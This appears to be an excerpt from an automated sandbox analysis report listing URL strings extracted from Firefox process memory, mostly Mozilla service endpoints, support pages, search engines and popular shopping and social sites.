Source: firefox.exe, 00000019.00000003.2014148406.000001EBFD41F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2070420882.000001EBFDEEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000019.00000003.2096280954.000001EBFDC32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2096603394.000001EBFDC24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000003.1682835874.000001EBF266B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651589234.000001EBF266B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000019.00000003.2076225546.000001EBFDE14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000003.2076225546.000001EBFDE14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1885049515.000001EBEEC09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000019.00000003.1681681490.000001EBF34C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1649737286.000001EBF34C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000019.00000003.1918480363.000001EBFD776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000019.00000003.1918480363.000001EBFD770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000019.00000003.1657718253.000001EBF31D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685774708.000001EBF31DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2094202680.000001EBFE047000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000019.00000003.2075946209.000001EBFDE31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093355509.000001EBFDE31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2095774729.000001EBFDC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2096603394.000001EBFDC24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883417146.000001EBEFC51000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1686886393.000001EBEFC51000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/nimbus:enrollments-updated
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562303877.000001EBF1875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1560793169.000001EBF1600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1946884403.000001EBFE283000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2095774729.000001EBFDC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562472271.000001EBF1887000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1968357533.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967714144.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC18000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000019.00000003.1916297892.000001EBFD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1915775011.000001EBF9256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562472271.000001EBF1887000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562472271.000001EBF1887000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000003.2090363759.000001EBFE8A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=resource://activity-stream/lib/ASRouterTargeting.
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000019.00000003.1952261425.000001EBFF737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1954462941.000001EBFF739000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1955254966.000001EBFF730000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1954742353.000001EBFF730000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/https://www.amazon.co.uk/_validateBranches/schema
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: firefox.exe, 00000019.00000003.1921482051.000001EBFDB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1921753296.000001EBFDB15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1919778628.000001EBFD7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1918480363.000001EBFD791000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?loadMessagesForProvider/messages
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000003.1653540755.000001EBF45A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000019.00000003.1735729821.000001EBED5D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
